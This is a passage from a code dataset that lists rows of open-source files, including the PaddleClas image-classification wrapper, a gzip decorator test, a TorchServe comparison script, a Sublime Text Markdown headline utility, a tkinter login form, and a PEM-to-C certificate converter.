max_stars_repo_path
stringlengths 4
245
| max_stars_repo_name
stringlengths 7
115
| max_stars_count
int64 101
368k
| id
stringlengths 2
8
| content
stringlengths 6
1.03M
|
---|---|---|---|---|
myRL/algo/__init__.py | Shiduo-zh/pybulletSim | 562 | 12744723 | <reponame>Shiduo-zh/pybulletSim<gh_stars>100-1000
from .ppo import PPO
|
copy_memory/model.py | dnbaker/pytorch-dilated-rnn | 123 | 12744729 | from torch import nn
from drnn import DRNN
class DRNN_Copy(nn.Module):
def __init__(self, input_size, hidden_size, num_layers, dropout, output_size):
super(DRNN_Copy, self).__init__()
self.drnn = DRNN(cell_type='GRU', dropout=dropout, n_hidden=hidden_size,
n_input=input_size, n_layers=num_layers, batch_first=True)
self.linear = nn.Linear(hidden_size, output_size)
self.init_weights()
def init_weights(self):
self.linear.weight.data.normal_(0,0.01)
def forward(self, x): # x: (batch, steps, input_size)
y1, _ = self.drnn(x) # y1: (batch, steps, hidden_size)
#import pdb
#pdb.set_trace()
return self.linear(y1) # (batch, steps, output_size) |
platform/polycommon/tests/test_gzip_decorator.py | admariner/polyaxon | 3,200 | 12744749 | <filename>platform/polycommon/tests/test_gzip_decorator.py
#!/usr/bin/python
#
# Copyright 2018-2021 Polyaxon, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from faker import Faker
from flaky import flaky
from rest_framework.response import Response
from rest_framework.views import APIView
from django.test import RequestFactory, TestCase
from polycommon.apis.gzip import gzip
class TestGZip(TestCase):
def setUp(self):
super(TestGZip, self).setUp()
fake = Faker()
class TestView(APIView):
@gzip()
def get(self, request, *args, **kwargs):
"""Example to check `Content-Encoding` header is set to 'gzip'."""
return Response(status=200, data=fake.text())
class SubClassTestView(TestView):
def get(self, request, *args, **kwargs):
"""Example to check that no status is set after overriding inherited endpoints."""
return Response(status=200, data=fake.text())
self.view = TestView.as_view()
self.subclass_view = SubClassTestView.as_view()
self.factory = RequestFactory()
@flaky(max_runs=3)
def test_content_encoding_is_set_correctly(self):
response = self.view(self.factory.get(""))
assert "Content-Encoding" in response
assert response["Content-Encoding"] == "gzip"
@flaky(max_runs=3)
def test_content_encoding_is_set_correctly_after_subclassing(self):
response = self.subclass_view(self.factory.get(""))
assert "Content-Encoding" not in response
|
paddleclas.py | Adgeros/PaddleClas | 3,763 | 12744764 | <gh_stars>1000+
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
__dir__ = os.path.dirname(__file__)
sys.path.append(os.path.join(__dir__, ""))
sys.path.append(os.path.join(__dir__, "deploy"))
from typing import Union, Generator
import argparse
import shutil
import textwrap
import tarfile
import requests
import warnings
from functools import partial
from difflib import SequenceMatcher
import cv2
import numpy as np
from tqdm import tqdm
from prettytable import PrettyTable
from deploy.python.predict_cls import ClsPredictor
from deploy.utils.get_image_list import get_image_list
from deploy.utils import config
from ppcls.arch.backbone import *
__all__ = ["PaddleClas"]
BASE_DIR = os.path.expanduser("~/.paddleclas/")
BASE_INFERENCE_MODEL_DIR = os.path.join(BASE_DIR, "inference_model")
BASE_IMAGES_DIR = os.path.join(BASE_DIR, "images")
BASE_DOWNLOAD_URL = "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/inference/{}_infer.tar"
MODEL_SERIES = {
"AlexNet": ["AlexNet"],
"DarkNet": ["DarkNet53"],
"DeiT": [
"DeiT_base_distilled_patch16_224", "DeiT_base_distilled_patch16_384",
"DeiT_base_patch16_224", "DeiT_base_patch16_384",
"DeiT_small_distilled_patch16_224", "DeiT_small_patch16_224",
"DeiT_tiny_distilled_patch16_224", "DeiT_tiny_patch16_224"
],
"DenseNet": [
"DenseNet121", "DenseNet161", "DenseNet169", "DenseNet201",
"DenseNet264"
],
"DPN": ["DPN68", "DPN92", "DPN98", "DPN107", "DPN131"],
"EfficientNet": [
"EfficientNetB0", "EfficientNetB0_small", "EfficientNetB1",
"EfficientNetB2", "EfficientNetB3", "EfficientNetB4", "EfficientNetB5",
"EfficientNetB6", "EfficientNetB7"
],
"GhostNet":
["GhostNet_x0_5", "GhostNet_x1_0", "GhostNet_x1_3", "GhostNet_x1_3_ssld"],
"HRNet": [
"HRNet_W18_C", "HRNet_W30_C", "HRNet_W32_C", "HRNet_W40_C",
"HRNet_W44_C", "HRNet_W48_C", "HRNet_W64_C", "HRNet_W18_C_ssld",
"HRNet_W48_C_ssld"
],
"Inception": ["GoogLeNet", "InceptionV3", "InceptionV4"],
"MobileNetV1": [
"MobileNetV1_x0_25", "MobileNetV1_x0_5", "MobileNetV1_x0_75",
"MobileNetV1", "MobileNetV1_ssld"
],
"MobileNetV2": [
"MobileNetV2_x0_25", "MobileNetV2_x0_5", "MobileNetV2_x0_75",
"MobileNetV2", "MobileNetV2_x1_5", "MobileNetV2_x2_0",
"MobileNetV2_ssld"
],
"MobileNetV3": [
"MobileNetV3_small_x0_35", "MobileNetV3_small_x0_5",
"MobileNetV3_small_x0_75", "MobileNetV3_small_x1_0",
"MobileNetV3_small_x1_25", "MobileNetV3_large_x0_35",
"MobileNetV3_large_x0_5", "MobileNetV3_large_x0_75",
"MobileNetV3_large_x1_0", "MobileNetV3_large_x1_25",
"MobileNetV3_small_x1_0_ssld", "MobileNetV3_large_x1_0_ssld"
],
"RegNet": ["RegNetX_4GF"],
"Res2Net": [
"Res2Net50_14w_8s", "Res2Net50_26w_4s", "Res2Net50_vd_26w_4s",
"Res2Net200_vd_26w_4s", "Res2Net101_vd_26w_4s",
"Res2Net50_vd_26w_4s_ssld", "Res2Net101_vd_26w_4s_ssld",
"Res2Net200_vd_26w_4s_ssld"
],
"ResNeSt": ["ResNeSt50", "ResNeSt50_fast_1s1x64d"],
"ResNet": [
"ResNet18", "ResNet18_vd", "ResNet34", "ResNet34_vd", "ResNet50",
"ResNet50_vc", "ResNet50_vd", "ResNet50_vd_v2", "ResNet101",
"ResNet101_vd", "ResNet152", "ResNet152_vd", "ResNet200_vd",
"ResNet34_vd_ssld", "ResNet50_vd_ssld", "ResNet50_vd_ssld_v2",
"ResNet101_vd_ssld", "Fix_ResNet50_vd_ssld_v2", "ResNet50_ACNet_deploy"
],
"ResNeXt": [
"ResNeXt50_32x4d", "ResNeXt50_vd_32x4d", "ResNeXt50_64x4d",
"ResNeXt50_vd_64x4d", "ResNeXt101_32x4d", "ResNeXt101_vd_32x4d",
"ResNeXt101_32x8d_wsl", "ResNeXt101_32x16d_wsl",
"ResNeXt101_32x32d_wsl", "ResNeXt101_32x48d_wsl",
"Fix_ResNeXt101_32x48d_wsl", "ResNeXt101_64x4d", "ResNeXt101_vd_64x4d",
"ResNeXt152_32x4d", "ResNeXt152_vd_32x4d", "ResNeXt152_64x4d",
"ResNeXt152_vd_64x4d"
],
"SENet": [
"SENet154_vd", "SE_HRNet_W64_C_ssld", "SE_ResNet18_vd",
"SE_ResNet34_vd", "SE_ResNet50_vd", "SE_ResNeXt50_32x4d",
"SE_ResNeXt50_vd_32x4d", "SE_ResNeXt101_32x4d"
],
"ShuffleNetV2": [
"ShuffleNetV2_swish", "ShuffleNetV2_x0_25", "ShuffleNetV2_x0_33",
"ShuffleNetV2_x0_5", "ShuffleNetV2_x1_0", "ShuffleNetV2_x1_5",
"ShuffleNetV2_x2_0"
],
"SqueezeNet": ["SqueezeNet1_0", "SqueezeNet1_1"],
"SwinTransformer": [
"SwinTransformer_large_patch4_window7_224_22kto1k",
"SwinTransformer_large_patch4_window12_384_22kto1k",
"SwinTransformer_base_patch4_window7_224_22kto1k",
"SwinTransformer_base_patch4_window12_384_22kto1k",
"SwinTransformer_base_patch4_window12_384",
"SwinTransformer_base_patch4_window7_224",
"SwinTransformer_small_patch4_window7_224",
"SwinTransformer_tiny_patch4_window7_224"
],
"VGG": ["VGG11", "VGG13", "VGG16", "VGG19"],
"VisionTransformer": [
"ViT_base_patch16_224", "ViT_base_patch16_384", "ViT_base_patch32_384",
"ViT_large_patch16_224", "ViT_large_patch16_384",
"ViT_large_patch32_384", "ViT_small_patch16_224"
],
"Xception": [
"Xception41", "Xception41_deeplab", "Xception65", "Xception65_deeplab",
"Xception71"
]
}
class ImageTypeError(Exception):
"""ImageTypeError.
"""
def __init__(self, message=""):
super().__init__(message)
class InputModelError(Exception):
"""InputModelError.
"""
def __init__(self, message=""):
super().__init__(message)
def init_config(model_name,
inference_model_dir,
use_gpu=True,
batch_size=1,
topk=5,
**kwargs):
imagenet1k_map_path = os.path.join(
os.path.abspath(__dir__), "ppcls/utils/imagenet1k_label_list.txt")
cfg = {
"Global": {
"infer_imgs": kwargs["infer_imgs"]
if "infer_imgs" in kwargs else False,
"model_name": model_name,
"inference_model_dir": inference_model_dir,
"batch_size": batch_size,
"use_gpu": use_gpu,
"enable_mkldnn": kwargs["enable_mkldnn"]
if "enable_mkldnn" in kwargs else False,
"cpu_num_threads": kwargs["cpu_num_threads"]
if "cpu_num_threads" in kwargs else 1,
"enable_benchmark": False,
"use_fp16": kwargs["use_fp16"] if "use_fp16" in kwargs else False,
"ir_optim": True,
"use_tensorrt": kwargs["use_tensorrt"]
if "use_tensorrt" in kwargs else False,
"gpu_mem": kwargs["gpu_mem"] if "gpu_mem" in kwargs else 8000,
"enable_profile": False
},
"PreProcess": {
"transform_ops": [{
"ResizeImage": {
"resize_short": kwargs["resize_short"]
if "resize_short" in kwargs else 256
}
}, {
"CropImage": {
"size": kwargs["crop_size"]
if "crop_size" in kwargs else 224
}
}, {
"NormalizeImage": {
"scale": 0.00392157,
"mean": [0.485, 0.456, 0.406],
"std": [0.229, 0.224, 0.225],
"order": ''
}
}, {
"ToCHWImage": None
}]
},
"PostProcess": {
"main_indicator": "Topk",
"Topk": {
"topk": topk,
"class_id_map_file": imagenet1k_map_path
}
}
}
if "save_dir" in kwargs:
if kwargs["save_dir"] is not None:
cfg["PostProcess"]["SavePreLabel"] = {
"save_dir": kwargs["save_dir"]
}
if "class_id_map_file" in kwargs:
if kwargs["class_id_map_file"] is not None:
cfg["PostProcess"]["Topk"]["class_id_map_file"] = kwargs[
"class_id_map_file"]
cfg = config.AttrDict(cfg)
config.create_attr_dict(cfg)
return cfg
def args_cfg():
def str2bool(v):
return v.lower() in ("true", "t", "1")
parser = argparse.ArgumentParser()
parser.add_argument(
"--infer_imgs",
type=str,
required=True,
help="The image(s) to be predicted.")
parser.add_argument(
"--model_name", type=str, help="The model name to be used.")
parser.add_argument(
"--inference_model_dir",
type=str,
help="The directory of model files. Valid when model_name not specifed."
)
parser.add_argument(
"--use_gpu", type=str, default=True, help="Whether use GPU.")
parser.add_argument("--gpu_mem", type=int, default=8000, help="")
parser.add_argument(
"--enable_mkldnn",
type=str2bool,
default=False,
help="Whether use MKLDNN. Valid when use_gpu is False")
parser.add_argument("--cpu_num_threads", type=int, default=1, help="")
parser.add_argument(
"--use_tensorrt", type=str2bool, default=False, help="")
parser.add_argument("--use_fp16", type=str2bool, default=False, help="")
parser.add_argument(
"--batch_size", type=int, default=1, help="Batch size. Default by 1.")
parser.add_argument(
"--topk",
type=int,
default=5,
help="Return topk score(s) and corresponding results. Default by 5.")
parser.add_argument(
"--class_id_map_file",
type=str,
help="The path of file that map class_id and label.")
parser.add_argument(
"--save_dir",
type=str,
help="The directory to save prediction results as pre-label.")
parser.add_argument(
"--resize_short",
type=int,
default=256,
help="Resize according to short size.")
parser.add_argument(
"--crop_size", type=int, default=224, help="Centor crop size.")
args = parser.parse_args()
return vars(args)
def print_info():
"""Print list of supported models in formatted.
"""
table = PrettyTable(["Series", "Name"])
try:
sz = os.get_terminal_size()
width = sz.columns - 30 if sz.columns > 50 else 10
except OSError:
width = 100
for series in MODEL_SERIES:
names = textwrap.fill(" ".join(MODEL_SERIES[series]), width=width)
table.add_row([series, names])
width = len(str(table).split("\n")[0])
print("{}".format("-" * width))
print("Models supported by PaddleClas".center(width))
print(table)
print("Powered by PaddlePaddle!".rjust(width))
print("{}".format("-" * width))
def get_model_names():
"""Get the model names list.
"""
model_names = []
for series in MODEL_SERIES:
model_names += (MODEL_SERIES[series])
return model_names
def similar_architectures(name="", names=[], thresh=0.1, topk=10):
"""Find the most similar topk model names.
"""
scores = []
for idx, n in enumerate(names):
if n.startswith("__"):
continue
score = SequenceMatcher(None, n.lower(), name.lower()).quick_ratio()
if score > thresh:
scores.append((idx, score))
scores.sort(key=lambda x: x[1], reverse=True)
similar_names = [names[s[0]] for s in scores[:min(topk, len(scores))]]
return similar_names
def download_with_progressbar(url, save_path):
"""Download from url with progressbar.
"""
if os.path.isfile(save_path):
os.remove(save_path)
response = requests.get(url, stream=True)
total_size_in_bytes = int(response.headers.get("content-length", 0))
block_size = 1024 # 1 Kibibyte
progress_bar = tqdm(total=total_size_in_bytes, unit="iB", unit_scale=True)
with open(save_path, "wb") as file:
for data in response.iter_content(block_size):
progress_bar.update(len(data))
file.write(data)
progress_bar.close()
if total_size_in_bytes == 0 or progress_bar.n != total_size_in_bytes or not os.path.isfile(
save_path):
raise Exception(
f"Something went wrong while downloading file from {url}")
def check_model_file(model_name):
"""Check the model files exist and download and untar when no exist.
"""
storage_directory = partial(os.path.join, BASE_INFERENCE_MODEL_DIR,
model_name)
url = BASE_DOWNLOAD_URL.format(model_name)
tar_file_name_list = [
"inference.pdiparams", "inference.pdiparams.info", "inference.pdmodel"
]
model_file_path = storage_directory("inference.pdmodel")
params_file_path = storage_directory("inference.pdiparams")
if not os.path.exists(model_file_path) or not os.path.exists(
params_file_path):
tmp_path = storage_directory(url.split("/")[-1])
print(f"download {url} to {tmp_path}")
os.makedirs(storage_directory(), exist_ok=True)
download_with_progressbar(url, tmp_path)
with tarfile.open(tmp_path, "r") as tarObj:
for member in tarObj.getmembers():
filename = None
for tar_file_name in tar_file_name_list:
if tar_file_name in member.name:
filename = tar_file_name
if filename is None:
continue
file = tarObj.extractfile(member)
with open(storage_directory(filename), "wb") as f:
f.write(file.read())
os.remove(tmp_path)
if not os.path.exists(model_file_path) or not os.path.exists(
params_file_path):
raise Exception(
f"Something went wrong while praparing the model[{model_name}] files!"
)
return storage_directory()
class PaddleClas(object):
"""PaddleClas.
"""
print_info()
def __init__(self,
model_name: str=None,
inference_model_dir: str=None,
use_gpu: bool=True,
batch_size: int=1,
topk: int=5,
**kwargs):
"""Init PaddleClas with config.
Args:
model_name (str, optional): The model name supported by PaddleClas. If specified, override config. Defaults to None.
inference_model_dir (str, optional): The directory that contained model file and params file to be used. If specified, override config. Defaults to None.
use_gpu (bool, optional): Whether use GPU. If specified, override config. Defaults to True.
batch_size (int, optional): The batch size to pridict. If specified, override config. Defaults to 1.
topk (int, optional): Return the top k prediction results with the highest score. Defaults to 5.
"""
super().__init__()
self._config = init_config(model_name, inference_model_dir, use_gpu,
batch_size, topk, **kwargs)
self._check_input_model()
self.cls_predictor = ClsPredictor(self._config)
def get_config(self):
"""Get the config.
"""
return self._config
def _check_input_model(self):
"""Check input model name or model files.
"""
candidate_model_names = get_model_names()
input_model_name = self._config.Global.get("model_name", None)
inference_model_dir = self._config.Global.get("inference_model_dir",
None)
if input_model_name is not None:
similar_names = similar_architectures(input_model_name,
candidate_model_names)
similar_names_str = ", ".join(similar_names)
if input_model_name not in candidate_model_names:
err = f"{input_model_name} is not provided by PaddleClas. \nMaybe you want: [{similar_names_str}]. \nIf you want to use your own model, please specify inference_model_dir!"
raise InputModelError(err)
self._config.Global.inference_model_dir = check_model_file(
input_model_name)
return
elif inference_model_dir is not None:
model_file_path = os.path.join(inference_model_dir,
"inference.pdmodel")
params_file_path = os.path.join(inference_model_dir,
"inference.pdiparams")
if not os.path.isfile(model_file_path) or not os.path.isfile(
params_file_path):
err = f"There is no model file or params file in this directory: {inference_model_dir}"
raise InputModelError(err)
return
else:
err = f"Please specify the model name supported by PaddleClas or directory contained model files(inference.pdmodel, inference.pdiparams)."
raise InputModelError(err)
return
def predict(self, input_data: Union[str, np.array],
print_pred: bool=False) -> Generator[list, None, None]:
"""Predict input_data.
Args:
input_data (Union[str, np.array]):
When the type is str, it is the path of image, or the directory containing images, or the URL of image from Internet.
When the type is np.array, it is the image data whose channel order is RGB.
print_pred (bool, optional): Whether print the prediction result. Defaults to False. Defaults to False.
Raises:
ImageTypeError: Illegal input_data.
Yields:
Generator[list, None, None]:
The prediction result(s) of input_data by batch_size. For every one image,
prediction result(s) is zipped as a dict, that includs topk "class_ids", "scores" and "label_names".
The format is as follow: [{"class_ids": [...], "scores": [...], "label_names": [...]}, ...]
"""
if isinstance(input_data, np.ndarray):
outputs = self.cls_predictor.predict(input_data)
yield self.cls_predictor.postprocess(outputs)
elif isinstance(input_data, str):
if input_data.startswith("http") or input_data.startswith("https"):
image_storage_dir = partial(os.path.join, BASE_IMAGES_DIR)
if not os.path.exists(image_storage_dir()):
os.makedirs(image_storage_dir())
image_save_path = image_storage_dir("tmp.jpg")
download_with_progressbar(input_data, image_save_path)
input_data = image_save_path
warnings.warn(
f"Image to be predicted from Internet: {input_data}, has been saved to: {image_save_path}"
)
image_list = get_image_list(input_data)
batch_size = self._config.Global.get("batch_size", 1)
topk = self._config.PostProcess.get('topk', 1)
img_list = []
img_path_list = []
cnt = 0
for idx, img_path in enumerate(image_list):
img = cv2.imread(img_path)
if img is None:
warnings.warn(
f"Image file failed to read and has been skipped. The path: {img_path}"
)
continue
img = img[:, :, ::-1]
img_list.append(img)
img_path_list.append(img_path)
cnt += 1
if cnt % batch_size == 0 or (idx + 1) == len(image_list):
outputs = self.cls_predictor.predict(img_list)
preds = self.cls_predictor.postprocess(outputs,
img_path_list)
if print_pred and preds:
for pred in preds:
filename = pred.pop("file_name")
pred_str = ", ".join(
[f"{k}: {pred[k]}" for k in pred])
print(
f"filename: {filename}, top-{topk}, {pred_str}")
img_list = []
img_path_list = []
yield preds
else:
err = "Please input legal image! The type of image supported by PaddleClas are: NumPy.ndarray and string of local path or Ineternet URL"
raise ImageTypeError(err)
return
# for CLI
def main():
"""Function API used for commad line.
"""
cfg = args_cfg()
clas_engine = PaddleClas(**cfg)
res = clas_engine.predict(cfg["infer_imgs"], print_pred=True)
for _ in res:
pass
print("Predict complete!")
return
if __name__ == "__main__":
main()
|
EthanBrown.SublimeText2.EditorPackages/tools/PackageCache/SmartMarkdown/headline.py | michaelray/Iristyle-ChocolateyPackages | 123 | 12744792 | """Some utility functions for working with headline of Markdown.
Terminologies
- Headline :: The headline entity OR the text of the headline
- Content :: The content under the current headline. It stops after
encountering a headline with the same or higher level OR EOF.
"""
# Author: <NAME> <<EMAIL>>
import re
import sublime
try:
from .utilities import is_region_void
except ValueError:
from utilities import is_region_void
MATCH_PARENT = 1 # Match headlines at the same or higher level
MATCH_CHILD = 2 # Match headlines at the same or lower level
MATCH_SILBING = 3 # Only Match headlines at the same level.
MATCH_ANY = 4 # Any headlines would be matched.
ANY_LEVEL = -1 # level used when MATCH_ANY is used as match type
def region_of_content_of_headline_at_point(view, from_point):
"""Extract the region of the content of under current headline."""
_, level = headline_and_level_at_point(view, from_point)
if level == None:
return None
if is_content_empty_at_point(view, from_point):
return None
line_num, _ = view.rowcol(from_point)
content_line_start_point = view.text_point(line_num + 1, 0)
next_headline, _ = find_headline(view, \
content_line_start_point, \
level, \
True, \
MATCH_PARENT)
if not is_region_void(next_headline):
end_pos = next_headline.a - 1
else:
end_pos = view.size()
return sublime.Region(content_line_start_point, end_pos)
def headline_and_level_at_point(view, from_point, search_above_and_down=False):
"""Return the current headline and level.
If from_point is inside a headline, then return the headline and level.
Otherwise depends on the argument it might search above and down.
"""
line_region = view.line(from_point)
line_content = view.substr(line_region)
# Update the level in case it's headline.ANY_LEVEL
level = _extract_level_from_headline(line_content)
# Search above and down
if level is None and search_above_and_down:
# Search above
headline_region, _ = find_headline(view,\
from_point,\
ANY_LEVEL,
False,
skip_folded=True)
if not is_region_void(headline_region):
line_content, level = headline_and_level_at_point(view,\
headline_region.a)
# Search down
if level is None:
headline_region, _ = find_headline(view,\
from_point,\
ANY_LEVEL,
True,
skip_folded=True)
if not is_region_void(headline_region):
line_content, level = headline_and_level_at_point(view, headline_region.a)
return line_content, level
def _extract_level_from_headline(headline):
"""Extract the level of headline, None if not found.
"""
re_string = _get_re_string(ANY_LEVEL, MATCH_ANY)
match = re.match(re_string, headline)
if match:
return len(match.group(1))
else:
return None
def is_content_empty_at_point(view, from_point):
"""Check if the content under the current headline is empty.
For implementation, check if next line is a headline a the same
or higher level.
"""
_, level = headline_and_level_at_point(view, from_point)
if level is None:
raise ValueError("from_point must be inside a valid headline.")
line_num, _ = view.rowcol(from_point)
next_line_region = view.line(view.text_point(line_num + 1, 0))
next_line_content = view.substr(next_line_region)
next_line_level = _extract_level_from_headline(next_line_content)
# Note that EOF works too in this case.
if next_line_level and next_line_level <= level:
return True
else:
return False
def find_headline(view, from_point, level, forward=True, \
match_type=MATCH_ANY, skip_headline_at_point=False, \
skip_folded=False):
"""Return the region of the next headline or EOF.
Parameters
----------
view: sublime.view
from_point: int
From which to find.
level: int
The headline level to match.
forward: boolean
Search forward or backward
match_type: int
MATCH_SILBING, MATCH_PARENT, MATCH_CHILD or MATCH_ANY.
skip_headline_at_point: boolean
When searching whether skip the headline at point
skip_folded: boolean
Whether to skip the folded region
Returns
-------
match_region: int
Matched region, or None if not found.
match_level: int
The level of matched headline, or None if not found.
"""
if skip_headline_at_point:
# Move the point to the next line if we are
# current in a headline already.
from_point = _get_new_point_if_already_in_headline(view, from_point,
forward)
re_string = _get_re_string(level, match_type)
if forward:
match_region = view.find(re_string, from_point)
else:
all_match_regions = view.find_all(re_string)
match_region = _nearest_region_among_matches_from_point(view, \
all_match_regions, \
from_point, \
False, \
skip_folded)
if skip_folded:
while (_is_region_folded(match_region, view)):
from_point = match_region.b
match_region = view.find(re_string, from_point)
if not is_region_void(match_region):
if not is_scope_headline(view, match_region.a):
return find_headline(view, match_region.a, level, forward, \
match_type, True, skip_folded)
else:
## Extract the level of matched headlines according to the region
headline = view.substr(match_region)
match_level = _extract_level_from_headline(headline)
else:
match_level = None
return (match_region, match_level)
def _get_re_string(level, match_type=MATCH_ANY):
"""Get regular expression string according to match type.
Return regular expression string, rather than compiled string. Since
sublime's view.find function needs string.
Parameters
----------
match_type: int
MATCH_SILBING, MATCH_PARENT, MATCH_CHILD or ANY_LEVEL.
"""
if match_type == MATCH_ANY:
re_string = r'^(#+)\s.*'
else:
try:
if match_type == MATCH_PARENT:
re_string = r'^(#{1,%d})\s.*' % level
elif match_type == MATCH_CHILD:
re_string = r'^(#{%d,})\s.*' % level
elif match_type == MATCH_SILBING:
re_string = r'^(#{%d,%d})\s.*' % (level, level)
except ValueError:
print("match_type has to be specified if level isn't ANY_LEVE")
return re_string
def _get_new_point_if_already_in_headline(view, from_point, forward=True):
line_content = view.substr(view.line(from_point))
if _extract_level_from_headline(line_content):
line_num, _ = view.rowcol(from_point)
if forward:
return view.text_point(line_num + 1, 0)
else:
return view.text_point(line_num, 0) - 1
else:
return from_point
def is_scope_headline(view, from_point):
return view.score_selector(from_point, "markup.heading") > 0 or \
view.score_selector(from_point, "meta.block-level.markdown") > 0
def _nearest_region_among_matches_from_point(view, all_match_regions, \
from_point, forward=False,
skip_folded=True):
"""Find the nearest matched region among all matched regions.
None if not found.
"""
nearest_region = None
for r in all_match_regions:
if not forward and r.b <= from_point and \
(not nearest_region or r.a > nearest_region.a):
candidate = r
elif forward and r.a >= from_point and \
(not nearest_region or r.b < nearest_region.b):
candidate = r
else:
continue
if skip_folded and not _is_region_folded(candidate, view):
nearest_region = candidate
return nearest_region
def _is_region_folded(region, view):
for i in view.folded_regions():
if i.contains(region):
return True
return False
|
tools/deployment/test_torchserver.py | JiYuanFeng/mmclassification | 1,190 | 12744806 | from argparse import ArgumentParser
import numpy as np
import requests
from mmcls.apis import inference_model, init_model, show_result_pyplot
def parse_args():
parser = ArgumentParser()
parser.add_argument('img', help='Image file')
parser.add_argument('config', help='Config file')
parser.add_argument('checkpoint', help='Checkpoint file')
parser.add_argument('model_name', help='The model name in the server')
parser.add_argument(
'--inference-addr',
default='127.0.0.1:8080',
help='Address and port of the inference server')
parser.add_argument(
'--device', default='cuda:0', help='Device used for inference')
args = parser.parse_args()
return args
def main(args):
# Inference single image by native apis.
model = init_model(args.config, args.checkpoint, device=args.device)
model_result = inference_model(model, args.img)
show_result_pyplot(model, args.img, model_result, title='pytorch_result')
# Inference single image by torchserve engine.
url = 'http://' + args.inference_addr + '/predictions/' + args.model_name
with open(args.img, 'rb') as image:
response = requests.post(url, image)
server_result = response.json()
show_result_pyplot(model, args.img, server_result, title='server_result')
assert np.allclose(model_result['pred_score'], server_result['pred_score'])
print('Test complete, the results of PyTorch and TorchServe are the same.')
if __name__ == '__main__':
args = parse_args()
main(args)
|
tkinter/background-image/login/main-canvas.py | whitmans-max/python-examples | 140 | 12744807 |
#
# https://stackoverflow.com/a/47983927/1832058
#
import tkinter as tk
root = tk.Tk()
root.geometry('250x250')
root.title('Canvas')
canvas = tk.Canvas(root, width=250, height=250)
canvas.pack()
img = tk.PhotoImage(file='hal_9000.gif')
canvas.create_image((0, 0), image=img, anchor='nw')
canvas.create_text((10, 100), text='Username', anchor='w', fill='white', font=('Arial', 10))
canvas.create_text((10, 150), text='Password', anchor='w', fill='white', font=('Arial', 10))
name_entry = tk.Entry(canvas)
password_entry = tk.Entry(canvas, show='*')
canvas.create_window((240, 100), window=name_entry, anchor='e')
canvas.create_window((240, 150), window=password_entry, anchor='e')
root.mainloop()
|
google/datalab/utils/facets/feature_statistics_generator.py | freyrsae/pydatalab | 198 | 12744809 | <filename>google/datalab/utils/facets/feature_statistics_generator.py<gh_stars>100-1000
# Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Class for generating the feature_statistics proto.
The proto is used as input for the Overview visualization.
"""
import warnings
from .base_feature_statistics_generator import BaseFeatureStatisticsGenerator
from . import feature_statistics_pb2 as fs
class FeatureStatisticsGenerator(BaseFeatureStatisticsGenerator):
"""Generator of stats proto from TF data."""
def __init__(self):
BaseFeatureStatisticsGenerator.__init__(self, fs.FeatureNameStatistics,
fs.DatasetFeatureStatisticsList,
fs.Histogram)
def ProtoFromTfRecordFiles(files,
max_entries=10000,
features=None,
is_sequence=False,
iterator_options=None):
"""Creates a feature statistics proto from a set of TFRecord files.
Args:
files: A list of dicts describing files for each dataset for the proto.
Each
entry contains a 'path' field with the path to the TFRecord file on
disk
and a 'name' field to identify the dataset in the proto.
max_entries: The maximum number of examples to load from each dataset
in order to create the proto. Defaults to 10000.
features: A list of strings that is a whitelist of feature names to create
feature statistics for. If set to None then all features in the
dataset
are analyzed. Defaults to None.
is_sequence: True if the input data from 'tables' are tf.SequenceExamples,
False if tf.Examples. Defaults to false.
iterator_options: Options to pass to the iterator that reads the examples.
Defaults to None.
Returns:
The feature statistics proto for the provided files.
"""
warnings.warn(
'Use GenericFeatureStatisticsGenerator class method instead.',
DeprecationWarning)
return FeatureStatisticsGenerator().ProtoFromTfRecordFiles(
files, max_entries, features, is_sequence, iterator_options)
|
tools/make_server_cert.py | galenzhao/nodemcu-firmware | 7,567 | 12744813 | import os
import argparse
import base64
import re
import sys
class Cert(object):
def __init__(self, name, buff):
self.name = name
self.len = len(buff)
self.buff = buff
pass
def __str__(self):
out_str = ['\0']*32
for i in range(len(self.name)):
out_str[i] = self.name[i]
out_str = "".join(out_str)
out_str += str(chr(self.len & 0xFF))
out_str += str(chr((self.len & 0xFF00) >> 8))
out_str += self.buff
return out_str
def main():
parser = argparse.ArgumentParser(description='Convert PEM file(s) into C source file.')
parser.add_argument('--section',
default='.servercert.flash',
help='specify the section for the data (default is .servercert.flash)')
parser.add_argument('--name',
default='tls_server_cert_area',
help='specify the variable name for the data (default is tls_server_cert_area)')
parser.add_argument('file', nargs='+',
help='One or more PEM files')
args = parser.parse_args()
cert_list = []
cert_file_list = []
for cert_file in args.file:
with open(cert_file, 'r') as f:
buff = f.read()
m = re.search(r"-----BEGIN ([A-Z ]+)-----([^-]+?)-----END \1-----", buff, flags=re.DOTALL)
if not m:
sys.exit("Input file was not in PEM format")
if "----BEGIN" in buff[m.end(0):]:
sys.exit("Input file contains more than one PEM object")
cert_list.append(Cert(m.group(1), base64.b64decode(''.join(m.group(2).split()))))
print '__attribute__((section("%s"))) unsigned char %s[INTERNAL_FLASH_SECTOR_SIZE] = {' % (args.section, args.name)
for _cert in cert_list:
col = 0
for ch in str(_cert):
print ("0x%02x," % ord(ch)),
if col & 15 == 15:
print
col = col + 1
print '\n0xff};\n'
if __name__ == '__main__':
main()
|
src/media/audio/audio_core/schema/make_schema_header.py | allansrc/fuchsia | 210 | 12744822 | #!/usr/bin/env python3.8
